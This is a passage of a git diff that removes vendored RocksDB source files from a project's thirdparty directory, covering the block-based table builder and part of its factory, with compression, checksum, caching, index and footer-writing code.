-        data_block(table_options.block_restart_interval,
-                   table_options.use_delta_encoding),
-        range_del_block(1),  // TODO(andrewkr): restart_interval unnecessary
-        internal_prefix_transform(_ioptions.prefix_extractor),
-        compression_type(_compression_type),
-        compression_opts(_compression_opts),
-        compression_dict(_compression_dict),
-        flush_block_policy(
-            table_options.flush_block_policy_factory->NewFlushBlockPolicy(
-                table_options, data_block)),
-        column_family_id(_column_family_id),
-        column_family_name(_column_family_name),
-        creation_time(_creation_time),
-        oldest_key_time(_oldest_key_time) {
-    if (table_options.index_type ==
-        BlockBasedTableOptions::kTwoLevelIndexSearch) {
-      p_index_builder_ = PartitionedIndexBuilder::CreateIndexBuilder(
-          &internal_comparator, table_options);
-      index_builder.reset(p_index_builder_);
-    } else {
-      index_builder.reset(IndexBuilder::CreateIndexBuilder(
-          table_options.index_type, &internal_comparator,
-          &this->internal_prefix_transform, table_options));
-    }
-    if (skip_filters) {
-      filter_builder = nullptr;
-    } else {
-      filter_builder.reset(
-          CreateFilterBlockBuilder(_ioptions, table_options, p_index_builder_));
-    }
-
-    for (auto& collector_factories : *int_tbl_prop_collector_factories) {
-      table_properties_collectors.emplace_back(
-          collector_factories->CreateIntTblPropCollector(column_family_id));
-    }
-    table_properties_collectors.emplace_back(
-        new BlockBasedTablePropertiesCollector(
-            table_options.index_type, table_options.whole_key_filtering,
-            _ioptions.prefix_extractor != nullptr));
-  }
-};
-
-BlockBasedTableBuilder::BlockBasedTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const BlockBasedTableOptions& table_options,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, WritableFileWriter* file,
-    const CompressionType compression_type,
-    const CompressionOptions& compression_opts,
-    const std::string* compression_dict, const bool skip_filters,
-    const std::string& column_family_name, const uint64_t creation_time,
-    const uint64_t oldest_key_time) {
-  BlockBasedTableOptions sanitized_table_options(table_options);
-  if (sanitized_table_options.format_version == 0 &&
-      sanitized_table_options.checksum != kCRC32c) {
-    ROCKS_LOG_WARN(
-        ioptions.info_log,
-        "Silently converting format_version to 1 because checksum is "
-        "non-default");
-    // silently convert format_version to 1 to keep consistent with current
-    // behavior
-    sanitized_table_options.format_version = 1;
-  }
-
-  rep_ =
-      new Rep(ioptions, sanitized_table_options, internal_comparator,
-              int_tbl_prop_collector_factories, column_family_id, file,
-              compression_type, compression_opts, compression_dict,
-              skip_filters, column_family_name, creation_time, oldest_key_time);
-
-  if (rep_->filter_builder != nullptr) {
-    rep_->filter_builder->StartBlock(0);
-  }
-  if (table_options.block_cache_compressed.get() != nullptr) {
-    BlockBasedTable::GenerateCachePrefix(
-        table_options.block_cache_compressed.get(), file->writable_file(),
-        &rep_->compressed_cache_key_prefix[0],
-        &rep_->compressed_cache_key_prefix_size);
-  }
-}
-
-BlockBasedTableBuilder::~BlockBasedTableBuilder() {
-  assert(rep_->closed);  // Catch errors where caller forgot to call Finish()
-  delete rep_;
-}
-
-void BlockBasedTableBuilder::Add(const Slice& key, const Slice& value) {
-  Rep* r = rep_;
-  assert(!r->closed);
-  if (!ok()) return;
-  ValueType value_type = ExtractValueType(key);
-  if (IsValueType(value_type)) {
-    if (r->props.num_entries > 0) {
-      assert(r->internal_comparator.Compare(key, Slice(r->last_key)) > 0);
-    }
-
-    auto should_flush = r->flush_block_policy->Update(key, value);
-    if (should_flush) {
-      assert(!r->data_block.empty());
-      Flush();
-
-      // Add item to index block.
-      // We do not emit the index entry for a block until we have seen the
-      // first key for the next data block.  This allows us to use shorter
-      // keys in the index block.  For example, consider a block boundary
-      // between the keys "the quick brown fox" and "the who".  We can use
-      // "the r" as the key for the index block entry since it is >= all
-      // entries in the first block and < all entries in subsequent
-      // blocks.
-      if (ok()) {
-        r->index_builder->AddIndexEntry(&r->last_key, &key, r->pending_handle);
-      }
-    }
-
-    // Note: PartitionedFilterBlockBuilder requires key being added to filter
-    // builder after being added to index builder.
-    if (r->filter_builder != nullptr) {
-      r->filter_builder->Add(ExtractUserKey(key));
-    }
-
-    r->last_key.assign(key.data(), key.size());
-    r->data_block.Add(key, value);
-    r->props.num_entries++;
-    r->props.raw_key_size += key.size();
-    r->props.raw_value_size += value.size();
-
-    r->index_builder->OnKeyAdded(key);
-    NotifyCollectTableCollectorsOnAdd(key, value, r->offset,
-                                      r->table_properties_collectors,
-                                      r->ioptions.info_log);
-
-  } else if (value_type == kTypeRangeDeletion) {
-    // TODO(wanning&andrewkr) add num_tomestone to table properties
-    r->range_del_block.Add(key, value);
-    ++r->props.num_entries;
-    r->props.raw_key_size += key.size();
-    r->props.raw_value_size += value.size();
-    NotifyCollectTableCollectorsOnAdd(key, value, r->offset,
-                                      r->table_properties_collectors,
-                                      r->ioptions.info_log);
-  } else {
-    assert(false);
-  }
-}
-
-void BlockBasedTableBuilder::Flush() {
-  Rep* r = rep_;
-  assert(!r->closed);
-  if (!ok()) return;
-  if (r->data_block.empty()) return;
-  WriteBlock(&r->data_block, &r->pending_handle, true /* is_data_block */);
-  if (r->filter_builder != nullptr) {
-    r->filter_builder->StartBlock(r->offset);
-  }
-  r->props.data_size = r->offset;
-  ++r->props.num_data_blocks;
-}
-
-void BlockBasedTableBuilder::WriteBlock(BlockBuilder* block,
-                                        BlockHandle* handle,
-                                        bool is_data_block) {
-  WriteBlock(block->Finish(), handle, is_data_block);
-  block->Reset();
-}
-
-void BlockBasedTableBuilder::WriteBlock(const Slice& raw_block_contents,
-                                        BlockHandle* handle,
-                                        bool is_data_block) {
-  // File format contains a sequence of blocks where each block has:
-  //    block_data: uint8[n]
-  //    type: uint8
-  //    crc: uint32
-  assert(ok());
-  Rep* r = rep_;
-
-  auto type = r->compression_type;
-  Slice block_contents;
-  bool abort_compression = false;
-
-  StopWatchNano timer(r->ioptions.env,
-    ShouldReportDetailedTime(r->ioptions.env, r->ioptions.statistics));
-
-  if (raw_block_contents.size() < kCompressionSizeLimit) {
-    Slice compression_dict;
-    if (is_data_block && r->compression_dict && r->compression_dict->size()) {
-      compression_dict = *r->compression_dict;
-    }
-
-    block_contents = CompressBlock(raw_block_contents, r->compression_opts,
-                                   &type, r->table_options.format_version,
-                                   compression_dict, &r->compressed_output);
-
-    // Some of the compression algorithms are known to be unreliable. If
-    // the verify_compression flag is set then try to de-compress the
-    // compressed data and compare to the input.
-    if (type != kNoCompression && r->table_options.verify_compression) {
-      // Retrieve the uncompressed contents into a new buffer
-      BlockContents contents;
-      Status stat = UncompressBlockContentsForCompressionType(
-          block_contents.data(), block_contents.size(), &contents,
-          r->table_options.format_version, compression_dict, type,
-          r->ioptions);
-
-      if (stat.ok()) {
-        bool compressed_ok = contents.data.compare(raw_block_contents) == 0;
-        if (!compressed_ok) {
-          // The result of the compression was invalid. abort.
-          abort_compression = true;
-          ROCKS_LOG_ERROR(r->ioptions.info_log,
-                          "Decompressed block did not match raw block");
-          r->status =
-              Status::Corruption("Decompressed block did not match raw block");
-        }
-      } else {
-        // Decompression reported an error. abort.
-        r->status = Status::Corruption("Could not decompress");
-        abort_compression = true;
-      }
-    }
-  } else {
-    // Block is too big to be compressed.
-    abort_compression = true;
-  }
-
-  // Abort compression if the block is too big, or did not pass
-  // verification.
-  if (abort_compression) {
-    RecordTick(r->ioptions.statistics, NUMBER_BLOCK_NOT_COMPRESSED);
-    type = kNoCompression;
-    block_contents = raw_block_contents;
-  } else if (type != kNoCompression &&
-             ShouldReportDetailedTime(r->ioptions.env,
-                                      r->ioptions.statistics)) {
-    MeasureTime(r->ioptions.statistics, COMPRESSION_TIMES_NANOS,
-                timer.ElapsedNanos());
-    MeasureTime(r->ioptions.statistics, BYTES_COMPRESSED,
-                raw_block_contents.size());
-    RecordTick(r->ioptions.statistics, NUMBER_BLOCK_COMPRESSED);
-  }
-
-  WriteRawBlock(block_contents, type, handle);
-  r->compressed_output.clear();
-}
-
-void BlockBasedTableBuilder::WriteRawBlock(const Slice& block_contents,
-                                           CompressionType type,
-                                           BlockHandle* handle) {
-  Rep* r = rep_;
-  StopWatch sw(r->ioptions.env, r->ioptions.statistics, WRITE_RAW_BLOCK_MICROS);
-  handle->set_offset(r->offset);
-  handle->set_size(block_contents.size());
-  assert(r->status.ok());
-  r->status = r->file->Append(block_contents);
-  if (r->status.ok()) {
-    char trailer[kBlockTrailerSize];
-    trailer[0] = type;
-    char* trailer_without_type = trailer + 1;
-    switch (r->table_options.checksum) {
-      case kNoChecksum:
-        EncodeFixed32(trailer_without_type, 0);
-        break;
-      case kCRC32c: {
-        auto crc = crc32c::Value(block_contents.data(), block_contents.size());
-        crc = crc32c::Extend(crc, trailer, 1);  // Extend to cover block type
-        EncodeFixed32(trailer_without_type, crc32c::Mask(crc));
-        break;
-      }
-      case kxxHash: {
-        void* xxh = XXH32_init(0);
-        XXH32_update(xxh, block_contents.data(),
-                     static_cast<uint32_t>(block_contents.size()));
-        XXH32_update(xxh, trailer, 1);  // Extend  to cover block type
-        EncodeFixed32(trailer_without_type, XXH32_digest(xxh));
-        break;
-      }
-    }
-
-    assert(r->status.ok());
-    r->status = r->file->Append(Slice(trailer, kBlockTrailerSize));
-    if (r->status.ok()) {
-      r->status = InsertBlockInCache(block_contents, type, handle);
-    }
-    if (r->status.ok()) {
-      r->offset += block_contents.size() + kBlockTrailerSize;
-    }
-  }
-}
-
-Status BlockBasedTableBuilder::status() const {
-  return rep_->status;
-}
-
-static void DeleteCachedBlock(const Slice& key, void* value) {
-  Block* block = reinterpret_cast<Block*>(value);
-  delete block;
-}
-
-//
-// Make a copy of the block contents and insert into compressed block cache
-//
-Status BlockBasedTableBuilder::InsertBlockInCache(const Slice& block_contents,
-                                                  const CompressionType type,
-                                                  const BlockHandle* handle) {
-  Rep* r = rep_;
-  Cache* block_cache_compressed = r->table_options.block_cache_compressed.get();
-
-  if (type != kNoCompression && block_cache_compressed != nullptr) {
-
-    size_t size = block_contents.size();
-
-    std::unique_ptr<char[]> ubuf(new char[size + 1]);
-    memcpy(ubuf.get(), block_contents.data(), size);
-    ubuf[size] = type;
-
-    BlockContents results(std::move(ubuf), size, true, type);
-
-    Block* block = new Block(std::move(results), kDisableGlobalSequenceNumber);
-
-    // make cache key by appending the file offset to the cache prefix id
-    char* end = EncodeVarint64(
-                  r->compressed_cache_key_prefix +
-                  r->compressed_cache_key_prefix_size,
-                  handle->offset());
-    Slice key(r->compressed_cache_key_prefix, static_cast<size_t>
-              (end - r->compressed_cache_key_prefix));
-
-    // Insert into compressed block cache.
-    block_cache_compressed->Insert(key, block, block->usable_size(),
-                                   &DeleteCachedBlock);
-
-    // Invalidate OS cache.
-    r->file->InvalidateCache(static_cast<size_t>(r->offset), size);
-  }
-  return Status::OK();
-}
-
-Status BlockBasedTableBuilder::Finish() {
-  Rep* r = rep_;
-  bool empty_data_block = r->data_block.empty();
-  Flush();
-  assert(!r->closed);
-  r->closed = true;
-
-  // To make sure properties block is able to keep the accurate size of index
-  // block, we will finish writing all index entries here and flush them
-  // to storage after metaindex block is written.
-  if (ok() && !empty_data_block) {
-    r->index_builder->AddIndexEntry(
-        &r->last_key, nullptr /* no next data block */, r->pending_handle);
-  }
-
-  BlockHandle filter_block_handle, metaindex_block_handle, index_block_handle,
-      compression_dict_block_handle, range_del_block_handle;
-  // Write filter block
-  if (ok() && r->filter_builder != nullptr) {
-    Status s = Status::Incomplete();
-    while (s.IsIncomplete()) {
-      Slice filter_content = r->filter_builder->Finish(filter_block_handle, &s);
-      assert(s.ok() || s.IsIncomplete());
-      r->props.filter_size += filter_content.size();
-      WriteRawBlock(filter_content, kNoCompression, &filter_block_handle);
-    }
-  }
-
-  IndexBuilder::IndexBlocks index_blocks;
-  auto index_builder_status = r->index_builder->Finish(&index_blocks);
-  if (index_builder_status.IsIncomplete()) {
-    // We we have more than one index partition then meta_blocks are not
-    // supported for the index. Currently meta_blocks are used only by
-    // HashIndexBuilder which is not multi-partition.
-    assert(index_blocks.meta_blocks.empty());
-  } else if (!index_builder_status.ok()) {
-    return index_builder_status;
-  }
-
-  // Write meta blocks and metaindex block with the following order.
-  //    1. [meta block: filter]
-  //    2. [meta block: properties]
-  //    3. [meta block: compression dictionary]
-  //    4. [meta block: range deletion tombstone]
-  //    5. [metaindex block]
-  // write meta blocks
-  MetaIndexBuilder meta_index_builder;
-  for (const auto& item : index_blocks.meta_blocks) {
-    BlockHandle block_handle;
-    WriteBlock(item.second, &block_handle, false /* is_data_block */);
-    meta_index_builder.Add(item.first, block_handle);
-  }
-
-  if (ok()) {
-    if (r->filter_builder != nullptr) {
-      // Add mapping from "<filter_block_prefix>.Name" to location
-      // of filter data.
-      std::string key;
-      if (r->filter_builder->IsBlockBased()) {
-        key = BlockBasedTable::kFilterBlockPrefix;
-      } else {
-        key = r->table_options.partition_filters
-                  ? BlockBasedTable::kPartitionedFilterBlockPrefix
-                  : BlockBasedTable::kFullFilterBlockPrefix;
-      }
-      key.append(r->table_options.filter_policy->Name());
-      meta_index_builder.Add(key, filter_block_handle);
-    }
-
-    // Write properties and compression dictionary blocks.
-    {
-      PropertyBlockBuilder property_block_builder;
-      r->props.column_family_id = r->column_family_id;
-      r->props.column_family_name = r->column_family_name;
-      r->props.filter_policy_name = r->table_options.filter_policy != nullptr ?
-          r->table_options.filter_policy->Name() : "";
-      r->props.index_size =
-          r->index_builder->EstimatedSize() + kBlockTrailerSize;
-      r->props.comparator_name = r->ioptions.user_comparator != nullptr
-                                     ? r->ioptions.user_comparator->Name()
-                                     : "nullptr";
-      r->props.merge_operator_name = r->ioptions.merge_operator != nullptr
-                                         ? r->ioptions.merge_operator->Name()
-                                         : "nullptr";
-      r->props.compression_name = CompressionTypeToString(r->compression_type);
-      r->props.prefix_extractor_name =
-          r->ioptions.prefix_extractor != nullptr
-              ? r->ioptions.prefix_extractor->Name()
-              : "nullptr";
-
-      std::string property_collectors_names = "[";
-      property_collectors_names = "[";
-      for (size_t i = 0;
-           i < r->ioptions.table_properties_collector_factories.size(); ++i) {
-        if (i != 0) {
-          property_collectors_names += ",";
-        }
-        property_collectors_names +=
-            r->ioptions.table_properties_collector_factories[i]->Name();
-      }
-      property_collectors_names += "]";
-      r->props.property_collectors_names = property_collectors_names;
-      if (r->table_options.index_type ==
-          BlockBasedTableOptions::kTwoLevelIndexSearch) {
-        assert(r->p_index_builder_ != nullptr);
-        r->props.index_partitions = r->p_index_builder_->NumPartitions();
-        r->props.top_level_index_size =
-            r->p_index_builder_->EstimateTopLevelIndexSize(r->offset);
-      }
-      r->props.creation_time = r->creation_time;
-      r->props.oldest_key_time = r->oldest_key_time;
-
-      // Add basic properties
-      property_block_builder.AddTableProperty(r->props);
-
-      // Add use collected properties
-      NotifyCollectTableCollectorsOnFinish(r->table_properties_collectors,
-                                           r->ioptions.info_log,
-                                           &property_block_builder);
-
-      BlockHandle properties_block_handle;
-      WriteRawBlock(
-          property_block_builder.Finish(),
-          kNoCompression,
-          &properties_block_handle
-      );
-      meta_index_builder.Add(kPropertiesBlock, properties_block_handle);
-
-      // Write compression dictionary block
-      if (r->compression_dict && r->compression_dict->size()) {
-        WriteRawBlock(*r->compression_dict, kNoCompression,
-                      &compression_dict_block_handle);
-        meta_index_builder.Add(kCompressionDictBlock,
-                               compression_dict_block_handle);
-      }
-    }  // end of properties/compression dictionary block writing
-
-    if (ok() && !r->range_del_block.empty()) {
-      WriteRawBlock(r->range_del_block.Finish(), kNoCompression,
-                    &range_del_block_handle);
-      meta_index_builder.Add(kRangeDelBlock, range_del_block_handle);
-    }  // range deletion tombstone meta block
-  }    // meta blocks
-
-  // Write index block
-  if (ok()) {
-    // flush the meta index block
-    WriteRawBlock(meta_index_builder.Finish(), kNoCompression,
-                  &metaindex_block_handle);
-
-    const bool is_data_block = true;
-    WriteBlock(index_blocks.index_block_contents, &index_block_handle,
-               !is_data_block);
-    // If there are more index partitions, finish them and write them out
-    Status& s = index_builder_status;
-    while (s.IsIncomplete()) {
-      s = r->index_builder->Finish(&index_blocks, index_block_handle);
-      if (!s.ok() && !s.IsIncomplete()) {
-        return s;
-      }
-      WriteBlock(index_blocks.index_block_contents, &index_block_handle,
-                 !is_data_block);
-      // The last index_block_handle will be for the partition index block
-    }
-  }
-
-  // Write footer
-  if (ok()) {
-    // No need to write out new footer if we're using default checksum.
-    // We're writing legacy magic number because we want old versions of RocksDB
-    // be able to read files generated with new release (just in case if
-    // somebody wants to roll back after an upgrade)
-    // TODO(icanadi) at some point in the future, when we're absolutely sure
-    // nobody will roll back to RocksDB 2.x versions, retire the legacy magic
-    // number and always write new table files with new magic number
-    bool legacy = (r->table_options.format_version == 0);
-    // this is guaranteed by BlockBasedTableBuilder's constructor
-    assert(r->table_options.checksum == kCRC32c ||
-           r->table_options.format_version != 0);
-    Footer footer(legacy ? kLegacyBlockBasedTableMagicNumber
-                         : kBlockBasedTableMagicNumber,
-                  r->table_options.format_version);
-    footer.set_metaindex_handle(metaindex_block_handle);
-    footer.set_index_handle(index_block_handle);
-    footer.set_checksum(r->table_options.checksum);
-    std::string footer_encoding;
-    footer.EncodeTo(&footer_encoding);
-    assert(r->status.ok());
-    r->status = r->file->Append(footer_encoding);
-    if (r->status.ok()) {
-      r->offset += footer_encoding.size();
-    }
-  }
-
-  return r->status;
-}
-
-void BlockBasedTableBuilder::Abandon() {
-  Rep* r = rep_;
-  assert(!r->closed);
-  r->closed = true;
-}
-
-uint64_t BlockBasedTableBuilder::NumEntries() const {
-  return rep_->props.num_entries;
-}
-
-uint64_t BlockBasedTableBuilder::FileSize() const {
-  return rep_->offset;
-}
-
-bool BlockBasedTableBuilder::NeedCompact() const {
-  for (const auto& collector : rep_->table_properties_collectors) {
-    if (collector->NeedCompact()) {
-      return true;
-    }
-  }
-  return false;
-}
-
-TableProperties BlockBasedTableBuilder::GetTableProperties() const {
-  TableProperties ret = rep_->props;
-  for (const auto& collector : rep_->table_properties_collectors) {
-    for (const auto& prop : collector->GetReadableProperties()) {
-      ret.readable_properties.insert(prop);
-    }
-    collector->Finish(&ret.user_collected_properties);
-  }
-  return ret;
-}
-
-const std::string BlockBasedTable::kFilterBlockPrefix = "filter.";
-const std::string BlockBasedTable::kFullFilterBlockPrefix = "fullfilter.";
-const std::string BlockBasedTable::kPartitionedFilterBlockPrefix =
-    "partitionedfilter.";
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_builder.h b/thirdparty/rocksdb/table/block_based_table_builder.h
deleted file mode 100644
index 36dfce1..0000000
--- a/thirdparty/rocksdb/table/block_based_table_builder.h
+++ /dev/null
@@ -1,129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "table/table_builder.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class WritableFile;
-struct BlockBasedTableOptions;
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-
-class BlockBasedTableBuilder : public TableBuilder {
- public:
-  // Create a builder that will store the contents of the table it is
-  // building in *file.  Does not close the file.  It is up to the
-  // caller to close the file after calling Finish().
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary, or nullptr.
-  BlockBasedTableBuilder(
-      const ImmutableCFOptions& ioptions,
-      const BlockBasedTableOptions& table_options,
-      const InternalKeyComparator& internal_comparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t column_family_id, WritableFileWriter* file,
-      const CompressionType compression_type,
-      const CompressionOptions& compression_opts,
-      const std::string* compression_dict, const bool skip_filters,
-      const std::string& column_family_name, const uint64_t creation_time = 0,
-      const uint64_t oldest_key_time = 0);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~BlockBasedTableBuilder();
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override;
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  bool NeedCompact() const override;
-
-  // Get table properties
-  TableProperties GetTableProperties() const override;
-
- private:
-  bool ok() const { return status().ok(); }
-
-  // Call block's Finish() method
-  // and then write the compressed block contents to file.
-  void WriteBlock(BlockBuilder* block, BlockHandle* handle, bool is_data_block);
-
-  // Compress and write block content to the file.
-  void WriteBlock(const Slice& block_contents, BlockHandle* handle,
-                  bool is_data_block);
-  // Directly write data to the file.
-  void WriteRawBlock(const Slice& data, CompressionType, BlockHandle* handle);
-  Status InsertBlockInCache(const Slice& block_contents,
-                            const CompressionType type,
-                            const BlockHandle* handle);
-  struct Rep;
-  class BlockBasedTablePropertiesCollectorFactory;
-  class BlockBasedTablePropertiesCollector;
-  Rep* rep_;
-
-  // Advanced operation: flush any buffered key/value pairs to file.
-  // Can be used to ensure that two adjacent entries never live in
-  // the same data block.  Most clients should not need to use this method.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Flush();
-
-  // Some compression libraries fail when the raw size is bigger than int. If
-  // uncompressed size is bigger than kCompressionSizeLimit, don't compress it
-  const uint64_t kCompressionSizeLimit = std::numeric_limits<int>::max();
-
-  // No copying allowed
-  BlockBasedTableBuilder(const BlockBasedTableBuilder&) = delete;
-  void operator=(const BlockBasedTableBuilder&) = delete;
-};
-
-Slice CompressBlock(const Slice& raw,
-                    const CompressionOptions& compression_options,
-                    CompressionType* type, uint32_t format_version,
-                    const Slice& compression_dict,
-                    std::string* compressed_output);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_factory.cc b/thirdparty/rocksdb/table/block_based_table_factory.cc
deleted file mode 100644
index 0c6bbbc..0000000
--- a/thirdparty/rocksdb/table/block_based_table_factory.cc
+++ /dev/null
@@ -1,417 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_table_factory.h"
-
-#include <memory>
-#include <string>
-#include <stdint.h>
-
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/flush_block_policy.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-BlockBasedTableFactory::BlockBasedTableFactory(
-    const BlockBasedTableOptions& _table_options)
-    : table_options_(_table_options) {
-  if (table_options_.flush_block_policy_factory == nullptr) {
-    table_options_.flush_block_policy_factory.reset(
-        new FlushBlockBySizePolicyFactory());
-  }
-  if (table_options_.no_block_cache) {
-    table_options_.block_cache.reset();
-  } else if (table_options_.block_cache == nullptr) {
-    table_options_.block_cache = NewLRUCache(8 << 20);
-  }
-  if (table_options_.block_size_deviation < 0 ||
-      table_options_.block_size_deviation > 100) {
-    table_options_.block_size_deviation = 0;
-  }
-  if (table_options_.block_restart_interval < 1) {
-    table_options_.block_restart_interval = 1;
-  }
-  if (table_options_.index_block_restart_interval < 1) {
-    table_options_.index_block_restart_interval = 1;
-  }
-  if (table_options_.partition_filters &&
-      table_options_.index_type !=
-          BlockBasedTableOptions::kTwoLevelIndexSearch) {
-    // We do not support partitioned filters without partitioning indexes
-    table_options_.partition_filters = false;
-  }
-}
-
-Status BlockBasedTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader,
-    bool prefetch_index_and_filter_in_cache) const {
-  return BlockBasedTable::Open(
-      table_reader_options.ioptions, table_reader_options.env_options,
-      table_options_, table_reader_options.internal_comparator, std::move(file),
-      file_size, table_reader, prefetch_index_and_filter_in_cache,
-      table_reader_options.skip_filters, table_reader_options.level);
-}
-
-TableBuilder* BlockBasedTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  auto table_builder = new BlockBasedTableBuilder(
-      table_builder_options.ioptions, table_options_,
-      table_builder_options.internal_comparator,
-      table_builder_options.int_tbl_prop_collector_factories, column_family_id,
-      file, table_builder_options.compression_type,
-      table_builder_options.compression_opts,
-      table_builder_options.compression_dict,
-      table_builder_options.skip_filters,
-      table_builder_options.column_family_name,
-      table_builder_options.creation_time,
-      table_builder_options.oldest_key_time);
-
-  return table_builder;
-}
-
-Status BlockBasedTableFactory::SanitizeOptions(
-    const DBOptions& db_opts,
-    const ColumnFamilyOptions& cf_opts) const {
-  if (table_options_.index_type == BlockBasedTableOptions::kHashSearch &&
-      cf_opts.prefix_extractor == nullptr) {
-    return Status::InvalidArgument("Hash index is specified for block-based "
-        "table, but prefix_extractor is not given");
-  }
-  if (table_options_.cache_index_and_filter_blocks &&
-      table_options_.no_block_cache) {
-    return Status::InvalidArgument("Enable cache_index_and_filter_blocks, "
-        ", but block cache is disabled");
-  }
-  if (table_options_.pin_l0_filter_and_index_blocks_in_cache &&
-      table_options_.no_block_cache) {
-    return Status::InvalidArgument(
-        "Enable pin_l0_filter_and_index_blocks_in_cache, "
-        ", but block cache is disabled");
-  }
-  if (!BlockBasedTableSupportedVersion(table_options_.format_version)) {
-    return Status::InvalidArgument(
-        "Unsupported BlockBasedTable format_version. Please check "
-        "include/rocksdb/table.h for more info");
-  }
-  return Status::OK();
-}
-
-std::string BlockBasedTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  flush_block_policy_factory: %s (%p)\n",
-           table_options_.flush_block_policy_factory->Name(),
-           static_cast<void*>(table_options_.flush_block_policy_factory.get()));
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  cache_index_and_filter_blocks: %d\n",
-           table_options_.cache_index_and_filter_blocks);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "  cache_index_and_filter_blocks_with_high_priority: %d\n",
-           table_options_.cache_index_and_filter_blocks_with_high_priority);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "  pin_l0_filter_and_index_blocks_in_cache: %d\n",
-           table_options_.pin_l0_filter_and_index_blocks_in_cache);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_type: %d\n",
-           table_options_.index_type);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  hash_index_allow_collision: %d\n",
-           table_options_.hash_index_allow_collision);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  checksum: %d\n",
-           table_options_.checksum);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  no_block_cache: %d\n",
-           table_options_.no_block_cache);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  block_cache: %p\n",
-           static_cast<void*>(table_options_.block_cache.get()));
-  ret.append(buffer);
-  if (table_options_.block_cache) {
-    const char* block_cache_name = table_options_.block_cache->Name();
-    if (block_cache_name != nullptr) {
-      snprintf(buffer, kBufferSize, "  block_cache_name: %s\n",
-               block_cache_name);
-      ret.append(buffer);
-    }
-    ret.append("  block_cache_options:\n");
-    ret.append(table_options_.block_cache->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  block_cache_compressed: %p\n",
-           static_cast<void*>(table_options_.block_cache_compressed.get()));
-  ret.append(buffer);
-  if (table_options_.block_cache_compressed) {
-    const char* block_cache_compressed_name =
-        table_options_.block_cache_compressed->Name();
-    if (block_cache_compressed_name != nullptr) {
-      snprintf(buffer, kBufferSize, "  block_cache_name: %s\n",
-               block_cache_compressed_name);
-      ret.append(buffer);
-    }
-    ret.append("  block_cache_compressed_options:\n");
-    ret.append(table_options_.block_cache_compressed->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  persistent_cache: %p\n",
-           static_cast<void*>(table_options_.persistent_cache.get()));
-  ret.append(buffer);
-  if (table_options_.persistent_cache) {
-    snprintf(buffer, kBufferSize, "  persistent_cache_options:\n");
-    ret.append(buffer);
-    ret.append(table_options_.persistent_cache->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  block_size: %" ROCKSDB_PRIszt "\n",
-           table_options_.block_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  block_size_deviation: %d\n",
-           table_options_.block_size_deviation);
-  ret.append(buffer);
